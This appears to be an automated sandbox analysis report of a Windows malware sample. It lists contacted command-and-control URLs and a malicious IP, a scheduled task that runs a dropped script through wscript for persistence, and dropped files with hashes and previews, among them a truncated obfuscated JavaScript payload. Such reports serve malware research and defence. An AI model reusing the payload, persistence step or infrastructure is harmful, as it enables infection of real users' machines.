https://bd0ba/index.php	wscript.exe, 0000000B.00000002.3369330783.0000000002BF9000.00000004.00000010.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://bd0baba4.site/index.phpP	wscript.exe, 0000000A.00000002.3370809663.0000000005353000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://bd0baba4.store/index.php	wscript.exe, 0000000A.00000002.3369947317.0000000004C10000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.3370693123.00000000051DA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.3370131318.0000000004CB8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000002.3370436183.000000000544D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000002.3369537830.0000000002EE8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000002.3370834799.0000000005895000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://bd0baba4.site/w	wscript.exe, 0000000A.00000002.3369609341.0000000002A52000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://bd0baba4.sitehp	wscript.exe, 0000000A.00000002.3369313927.00000000006F9000.00000004.00000010.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://bd0baba4.site/index.php_P	wscript.exe, 0000000A.00000002.3370809663.0000000005373000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://bd0baba4.site/index.phpdll	wscript.exe, 0000000B.00000002.3371056470.0000000005A30000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://bd0baba4.site/l	wscript.exe, 0000000A.00000002.3370809663.0000000005373000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://bd0baba4.site:443/index.php	wscript.exe, 0000000A.00000002.3369609341.0000000002A52000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000002.3369537830.0000000002F85000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://bd0baba4.site/IW	wscript.exe, 0000000B.00000002.3371056470.0000000005A9D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://bd0baba4.site/	wscript.exe, 0000000B.00000002.3369537830.0000000002F93000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://bd0baba4.store/index.phpo	wscript.exe, 0000000A.00000002.3370809663.0000000005310000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://bd0baba4.site/index.	wscript.exe, 0000000A.00000002.3370809663.0000000005373000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.159.131.230	bd0baba4.site	Russian Federation		64439	ITOS-ASRU	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1585978
Start date and time:	2025-01-08 15:46:09 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 31s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	16
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	YyVnwn8Zst.exe renamed because original name is a hash value
Original Sample Name:	880a3b6203fef131d20346d1258ae22031c3d84d8a35d01c8f4b7fe3729c0d0c.exe
Detection:	MAL
Classification:	mal100.rans.troj.expl.evad.winEXE@14/25@3/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 99% Number of executed functions: 81 Number of non-executed functions: 86
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, WmiPrvSE.exe
Excluded IPs from analysis (whitelisted): 13.107.246.45, 52.149.20.212
Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, d.3.0.0.0.0.0.0.0.0.0.0.0.0.0.0.7.0.0.0.8.0.4.0.0.3.0.1.3.0.6.2.ip6.arpa, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: YyVnwn8Zst.exe

Simulations

Behavior and APIs

Time	Type	Description
09:47:02	API Interceptor	38x Sleep call for process: powershell.exe modified
09:47:03	API Interceptor	1x Sleep call for process: wscript.exe modified
15:47:05	Task Scheduler	Run new task: 9e146be9-9e14-6be9-9e14-9e146be99e10 path: C:\Windows\SysWOW64\wscript.exe s>"C:\Users\user\AppData\Local\9e146be90.js" 188

Joe Sandbox View / Context

IPs

⊘No context

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ITOS-ASRU	https://blackshelter.org	Get hash	malicious	Unknown	Browse	185.228.234.75
	file.exe	Get hash	malicious	Cryptbot	Browse	185.228.235.50
	file.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, Vidar	Browse	185.228.235.50
	file.exe	Get hash	malicious	Cryptbot	Browse	185.228.235.50
	uMlLpvdLRU.exe	Get hash	malicious	Tofsee	Browse	185.228.234.180
	Crt09EgZK3.exe	Get hash	malicious	Tofsee	Browse	185.228.234.180
	6foBmRMlDy.exe	Get hash	malicious	Tofsee	Browse	185.228.234.180
	SecuriteInfo.com.PUA.Tool.InstSrv.3.16098.13705.exe	Get hash	malicious	Unknown	Browse	185.228.233.50
	SecuriteInfo.com.PUA.Tool.InstSrv.3.16098.13705.exe	Get hash	malicious	Unknown	Browse	185.228.233.50
	81zBpBAWwc.exe	Get hash	malicious	RHADAMANTHYS	Browse	185.228.233.50

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
1138de370e523e824bbca92d049a3777	Selvi Payroll Benefits & Bonus Agreementfdp.pdf	Get hash	malicious	Unknown	Browse	185.159.131.230
	mail (4).eml	Get hash	malicious	Unknown	Browse	185.159.131.230
	https://bRH5.bughtswo.com/tgs0/#bW1vb3JlQGVuYWJsZWNvbXAuY29t	Get hash	malicious	Unknown	Browse	185.159.131.230
	https://hallmark.greetingsweb.com/2865d1125997389a?l=22	Get hash	malicious	Unknown	Browse	185.159.131.230
	3e18bdf74f3caef770a7edcf748bdaf0e6a4a21664e69.exe	Get hash	malicious	AsyncRAT, GhostRat	Browse	185.159.131.230
	https://pharteewhi.xyz/	Get hash	malicious	Unknown	Browse	185.159.131.230
	https://antiphishing.vadesecure.com/v4?f=bnJjU3hQT3pQSmNQZVE3aOMl-Yxz6sxP-_mvIRuY-wdnZ1bXTFIOIwMxyCDi0KedKx4XzS44_P2zUeNIsKUb0ScW6k1yl1_sQ4IsBBcClSw_vWV34HFG0fKKBNYTYHpo&i=SGI0YVJGNmxZNE90Z2thMHUqf298Dc88cJEXrW3w1lA&k=dFBm&r=SW5LV3JodE9QZkRVZ3JEYa6kbR5XAzhHFJ0zbTQRADrRG7ugnfE15pwrEQUVhgv3E2tVXwBw8NfFSkf3wOZ0VA&s=ecaab139c1f3315ccc0d88a6451dccec431e8ce1d856e71e5109e33657c13a3c&u=https%3A%2F%2Fsender5.zohoinsights-crm.com%2Fck1%2F2d6f.327230a%2F5f929700-cca4-11ef-973d-525400f92481%2F4cb2ae4047e7a38310b2b2641663917c123a5dec%2F2%3Fe%3DGKxHQ%252FSSm8D%252B%252B3g8VEcICaLHKdekhRU94ImygZ37tRI%253D	Get hash	malicious	Unknown	Browse	185.159.131.230
	https://d3sdeiz39xdvhy.cloudfront.net	Get hash	malicious	Unknown	Browse	185.159.131.230
	https://share.hsforms.com/1Wcb3a5ziS0yUfGwanfFbLgsw4gs	Get hash	malicious	Unknown	Browse	185.159.131.230
	https://check.qlkwr.com/awjsx.captcha?u=8565c17d-9686-4e17-ae60-902c6d4876be	Get hash	malicious	Unknown	Browse	185.159.131.230

Dropped Files

⊘No context

Created / dropped Files

C:\Users\user\AppData\Local\9e146be90.js

Download File

Process:	C:\Windows\SysWOW64\wscript.exe
File Type:	ASCII text, with very long lines (57893), with CRLF line terminators
Category:	dropped
Size (bytes):	59774
Entropy (8bit):	3.992551020709288
Encrypted:	false
SSDEEP:	1536:QyoI1QxIag7HcbEZwunxGW/idSw+jg15Y38NmTH0+Q01FNqnq:5TGCaAvHqq
MD5:	E45E91D6A776D4D4C5A39BD13A01704D
SHA1:	566A5B9328874BA747BE4F5B331277CE15AE5898
SHA-256:	99B6062A9DABF81011E569495D0B31E7B3CDB049D73FE34AB72615FF8D1F8D39
SHA-512:	B6807C43D6EF7C526078FA7A4068D8FAA6285095EE094BD3323C6E859BF4DFED62C8EB7F15DFBCFD362C297CABC40D41C50ECCB367AF051A71185170E8CA0F3E
Malicious:	true
Preview:	..var i1a0a864a="db460075cc43160ac6420b6edb460075df42150acf460130f24c172c965113278d541739cb78163cdf1c0434df070130c1412d33c44b176edb460075da541127c457060ade4f1739c11c0434df07013dc84b1e0acc570239c4441321c4481c6edb460075cb541d6edb460075da4e1c0ac5530625965113278d501f3cf248103f965113278d501030c0781621965113278d521b31965113278d540023f2520039965113278d461638c4494f33cc4b0130965113278d500134965113278d540023f2441d3bc3421121f2531b38c8480721965113278d43052d90490739c11c0434df07012cde781327ce4f4923cc555225df442d34df441a6ecb521c36d94e1d3b8d461e30df535a26845c0f5fcb521c36d94e1d3b8d4e1c219f4f172d9e155a26845c0434df070068de09063afe53003cc3405a649b0e4922c54e1e3085555c39c8491521c51b4a7cdf1a55658a0c006edf420620df495227965a7833d8491121c4481c75df49167d845c0030d952003b8d6a1321c5091130c44b5a679c13456195144461950d3f34d94f5c27cc49163ac00f5b7c965a7833d8491121c4481c75ca421c0adf49160ade53007d845c0030d952003b8d551c31850e5c21c2740627c449157d9c115b6ed02d1420c344063cc2495232c8492d32d84e167ddd460034c00e0927c8530727c307073

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	2232
Entropy (8bit):	5.380805901110357
Encrypted:	false
SSDEEP:	48:lylWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMuge//8PUyus:lGLHyIFKL3IZ2KRH9Oug8s
MD5:	F9B7CF60C22DBE6B73266580FFD54629
SHA1:	05ED734C0A5EF2ECD025D4E39321ECDC96612623
SHA-256:	880A3240A482AB826198F84F548F4CB5B906E4A2D7399D19E3EF60916B8D2D89
SHA-512:	F55EFB17C1A45D594D165B9DC4FA2D1364B38AA2B0D1B3BAAE6E1E14B8F3BD77E3A28B7D89FA7F6BF3EEF3652434228B1A42BF9851F2CFBB6A7DCC0254AAAE38
Malicious:	false
Preview:	@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...\|...........System.ConfigurationH................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\11909669

Download File

Process:	C:\Windows\SysWOW64\wscript.exe
File Type:	data
Category:	dropped
Size (bytes):	60160
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	A3296FD2E5D8EA20D5A72D5ECC96BDF4
SHA1:	5086E6E2C6DBB6C82E81EF8E1D1A57BB705E9A12
SHA-256:	8BC6E308EA3DEDC723B4E906654EF8502AE1D57C8C7304F9D95EC628DFAAAFA2
SHA-512:	315C56547A46686952657E821D43C9E960C56E2001557FE6413580DEA89943B7DA5ABC0321179001690E7135B9179C2E6DBB7423735CAA82F1A5AC4585B2ACD6
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\4157934657

Download File

Process:	C:\Users\user\Desktop\YyVnwn8Zst.exe
File Type:	ASCII text, with very long lines (57893), with CRLF line terminators
Category:	dropped
Size (bytes):	59774
Entropy (8bit):	3.992551020709288
Encrypted:	false
SSDEEP:	1536:QyoI1QxIag7HcbEZwunxGW/idSw+jg15Y38NmTH0+Q01FNqnq:5TGCaAvHqq
MD5:	E45E91D6A776D4D4C5A39BD13A01704D
SHA1:	566A5B9328874BA747BE4F5B331277CE15AE5898
SHA-256:	99B6062A9DABF81011E569495D0B31E7B3CDB049D73FE34AB72615FF8D1F8D39
SHA-512:	B6807C43D6EF7C526078FA7A4068D8FAA6285095EE094BD3323C6E859BF4DFED62C8EB7F15DFBCFD362C297CABC40D41C50ECCB367AF051A71185170E8CA0F3E
Malicious:	false
Preview:	..var i1a0a864a="db460075cc43160ac6420b6edb460075df42150acf460130f24c172c965113278d541739cb78163cdf1c0434df070130c1412d33c44b176edb460075da541127c457060ade4f1739c11c0434df07013dc84b1e0acc570239c4441321c4481c6edb460075cb541d6edb460075da4e1c0ac5530625965113278d501f3cf248103f965113278d501030c0781621965113278d521b31965113278d540023f2520039965113278d461638c4494f33cc4b0130965113278d500134965113278d540023f2441d3bc3421121f2531b38c8480721965113278d43052d90490739c11c0434df07012cde781327ce4f4923cc555225df442d34df441a6ecb521c36d94e1d3b8d461e30df535a26845c0f5fcb521c36d94e1d3b8d4e1c219f4f172d9e155a26845c0434df070068de09063afe53003cc3405a649b0e4922c54e1e3085555c39c8491521c51b4a7cdf1a55658a0c006edf420620df495227965a7833d8491121c4481c75df49167d845c0030d952003b8d6a1321c5091130c44b5a679c13456195144461950d3f34d94f5c27cc49163ac00f5b7c965a7833d8491121c4481c75ca421c0adf49160ade53007d845c0030d952003b8d551c31850e5c21c2740627c449157d9c115b6ed02d1420c344063cc2495232c8492d32d84e167ddd460034c00e0927c8530727c307073

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_a1lxci2h.tsb.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jm5ptztb.eew.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_maknmkya.4s1.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_p5nm0kys.1oc.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_snmggjjd.qfj.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_soctrtec.eou.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yhh5qx23.n4n.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ymujq1dq.203.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\cerodedu.ads

Download File

Process:	C:\Users\user\Desktop\YyVnwn8Zst.exe
File Type:	ASCII text, with very long lines (4023), with no line terminators
Category:	dropped
Size (bytes):	4023
Entropy (8bit):	5.944377566220237
Encrypted:	false
SSDEEP:	96:SaFznoGij0VT123lsahaBOdclhxyfEym3lUR6MrJL:SaFsGi212VX8BOChxx5lhMlL
MD5:	CBACA0553F9A13F9B540A55A5CC03BAB
SHA1:	20253B3300FB0EC9C6E56E95B4CF080C78C41719
SHA-256:	022F581CE15B4F8CE63FD9BA218B865D48124BDA1518EB3B7155D461A3BFFC37
SHA-512:	4AD20C3497E57A3BE9170D53606295CA09D0764708E5F1618BB4F25D8CDBB9A769C7857C601E41249702E14D1EAAA1BE9C17C3DB9A9408C00B387E591B01B2D9
Malicious:	false
Preview:	3dUWyRFEEtFoBFRHdpuTod1Rbs5JfG2ln2kZHn7OnjvaQtQHFaTgqfeItng6lLNB6upn3svZ8mQx9Zl3ZfXiJY2yEmFoquIL36Wl5gqdUavuhMkeRYTxIWsBLytjIVH9Lv5LnmA08FjMrsBb0PYZciu7uK0uQd9imA7kEVDHTAFhinlW85ebYFL5VsjXYIzpO4xe46AacsAAhxPW3K58jJM1to5Qj4TaJCKJW8MWcMfekDXuLZt03yy9cLnRLFzqb0DS2SPVhOtVtMAhQrFFKzsfhd90Xmtb3ddtzAyKpKuENaG4FWJ0SHDYGHBXmmEnqWZyynPieNcvrjhV2hqYvCcN25eRXB36Me4Eg9qvPAeqtOlnjKaRQfdLWBVa2lZ4zoVBynROdlSqNVPxe6zthlbHPeolFcM9uLCyBfTk4PBqCSxRz85epNdP3zWwm5gB93RuGhQ7LFjtDFyEL9Sdf6jCnFnDrPXlFdFp07Q9fZZGWJYUN54IFdkeXbSRGNMAInxCRdOxrdXOg9jUoV1iDWrZvFpE2w2y55DSXPe4DmalEMLWO0aWBZb5YxGiMpPwKZyN46BIGNHc3vy9mzwIr3sP6cFA3xiXnZin00TKDXRYDWMtyZ9InjhsCv5c7xYmuyF0KxyL9Y3IHFnfYMFR9EBcS3y1hDYJjWRPBJWjd2OE0Cb70qCwFKFlecQILDMwZyH1gBTE2HGZgphb9ugxjlEaXsxjSOOi1oEbwDSNlIQGeAwOuJTQKb4naRTJuc0Wy7MTambbF75DuzdCcWl1Zatkg0yW3sOEUbp6FWEiYKxeamJeM0a8Jl4BoEHPooG1E1mAMEHTz1bqQ5uirz9ezt3JhSYx4VYGW6SH75j49sC09toUYlymTMzVgYhkHzaI170KZpWtx4IrmJWQdnY5ycvH3SLW1wviweWCU5dNg9fNnzAe6O6YvYjSPM6KN4oO1SVE53clmu1g1WXyeZNwZe7MK0hCuw4jKvpBCsUw

C:\Users\user\AppData\Local\Temp\esadiftwin.dm

Download File

Process:	C:\Users\user\Desktop\YyVnwn8Zst.exe
File Type:	ASCII text, with very long lines (760), with no line terminators
Category:	dropped
Size (bytes):	760
Entropy (8bit):	5.902627394721169
Encrypted:	false
SSDEEP:	12:06RXbXLVrj+wu+O4kl7ngE3ticfkLHrlqiIuUBLgY9PdMQ2mA6ncBl+34TzY1fWL:06xjZWeT2gyiSGHrlqmUtgYjNcxY1O8a
MD5:	F1EEC66E15AFF1FCF23DBAFA9F8E205B
SHA1:	2E7C0312A98FAFB886C583BC29E1FABE11ED3CB8
SHA-256:	CAF6F4F4C11E65163472CA48F72A6BEAEE20A4AC66CD419BEF4C7B726602409B
SHA-512:	ED2EEBFE8DB6A8AAD43CA92F49CA97A570E3D904163281DD7BA01B73929672E221F2F6C36334DDD85B0D1DA69F19F3C1496ECAF12D2A3160E7291710496D473D
Malicious:	false
Preview:	Ud6VmryjNwl6QddIsyTjw2equWPnzLqvNoRBo3jAcy2COZGIfr82O9ck1tU2q4SWbdAaAE8vze8fbGn3WPxWROINdO9NIpYfou2r0rtST1xLzB4ECHcvP6A1w7UFzvkBLjnU2uVgXEQztuZmMgrGlwnfihaCAGmFAXTCRXya2HBiNDUoHtYSUkOeRh8fFLRmyQtH0w7WCf7OGo0H6xxzWZwBzMRHkZIuyUe4Wyg3LieznhLyMQnQTOmVA0SScOjDga57qBWIxmg7lX0fVLPY38v1Y1pMJZXFBCrb538ZDV0kl50ZzlCmwapWTqEEt6nKt3wWFUXMmYvgs96UccsVtCOTYbta4qYS4fWaBnVgehZGccq5Hh7U9PBY7IK8L9C76o0rloCQKhD9yW2UMrBVt2yMwB9S4NGfOnOZdBOcu3YFW7dtRd2QeGfNBngIKMf92iovN7JdM6GSMdtObPk40oerpzMC5fPqLkaCtvOOpIMzf4PjpSIpaJJpjUPNWNdvnx2NDoUdg8lWKT6zW6IYBiW4qeFPyjjAloslEeFLPiTJ0YKNWCJzzrAyGKajDQkUDahad453bk3t60h1IO5lAoainh3K9E6hZUFwDGcwTOZWWgHJyNy81EBL0DnlI2qfDDCnPjOTHf5H7Et81sVT8bmK9K9owAyoyPGoNWKm88GOW7o7923F83iJcISpFk2cvOh63tt8xzWEjaFoCY9HsQKIphZap79EB1ZhOJWQ8qYb2q8ZkTxKizKX

C:\Users\user\AppData\Local\Temp\fautmand.pi

Download File

Process:	C:\Users\user\Desktop\YyVnwn8Zst.exe
File Type:	ASCII text, with very long lines (1150), with no line terminators
Category:	dropped
Size (bytes):	1150
Entropy (8bit):	5.904662060691767
Encrypted:	false
SSDEEP:	24:4MFSP+6/5NE9oQsshAU9KiwpziEoWzp7xuSUFBUkq7qgf:nsmCKAG0DBYy7pf
MD5:	3440632FA1B3837FCE0E3BB4F1910138
SHA1:	0C6F8F0DE2A14542F68AB23FB20460ECDCCF7C5C
SHA-256:	DC293682142759DBEC88D19D536DF5C17B18789AF0A44BDD4879F3371BD88751
SHA-512:	A4E3A7B8ADF79E6C226E0E04FECED537D5E9B5942595F87A6F8D54151994F5B694A4487CBACF793F834680A79C757E28DE297E7660F466D23739DBCA5349DB1B
Malicious:	false
Preview:	VrZ25lnOUqbnTjBk74J8Nvjw9Me0JNOcQCKC88LCT4OiZSUGNBtgbwU9MFRW2BpLexBnONEQNnL5ieJUDnGIiHqMZfT12QRQVSCbsqMF7cnIBDOTskM3VO78YfFut574eLrP44ocKhnVaj0pAzT9YmfGg4PdqgJM8XbqWdzrKmminlmYaiNS2D3tqTEFadNbASXrHuSquTPfid7q4bmwOFiFlzkzGhEG9es3Yc0aXecBNAIGC9TMVo4vyJnTncT3OJYoh8tWHEVhlufRm4QuVXv0yXDV0s2VBTsB21VZmW75cuqL4s0W9s5tmvi5eaKZpUZzXVLOxyecMclbsZjBLgRmswIgIhUWFZsTgkKmGlgu9oVCKYewZhFxIpLk9OK9pfOnHrIgoETiG11cOAnNJtvuarkAvlqL4y6tm2FZxhtKRzmy65Q9WKHfC4CTiDEVbuMDFVCmcHubLv27O8r3leuKK5e4hCN83h4kTZM8GFt3LYUoZAq6g5yLQTqUcJw18m42GlLgrMuiFjNUyVEnFR4xMTGTdElX5bEXEdPNCz0kTIn1Cc7Vyes1YZbw5EYa1QArPN8D6s7glgo7WIipvFBymEFjakylaIwejH1EJNl0vwAAZvzYY51z3OoEKMVup0LdovYNH4JQJKVKJHx8Uoc5WSXU9QllFBZGMhnTo37bmB10C0NCgIPJnhKiuvUn7EvphREUFbDVqf9QBPnTYlQVrO9MrLgmydPxK2LjyuO6NhmWvi7o8wZKTwgl9rAdpZnpV34dL07iyBdlhKIy2OlwskExVvVe0neWb5cAaADWXTmSne2SaWEU1gVLHix0z9hodrPfyhvdVCDWhuBk7n8MGOIXI72AOILQjiV1mhFtfYTm7mT9vOxvbkdZZTgzeSVZqixxSQmQJ3myU451gBi0luaKhcK8QSimQLp0ku28kiUtOVkB3YVWgugqm900xpj5dHTw8cjOqDn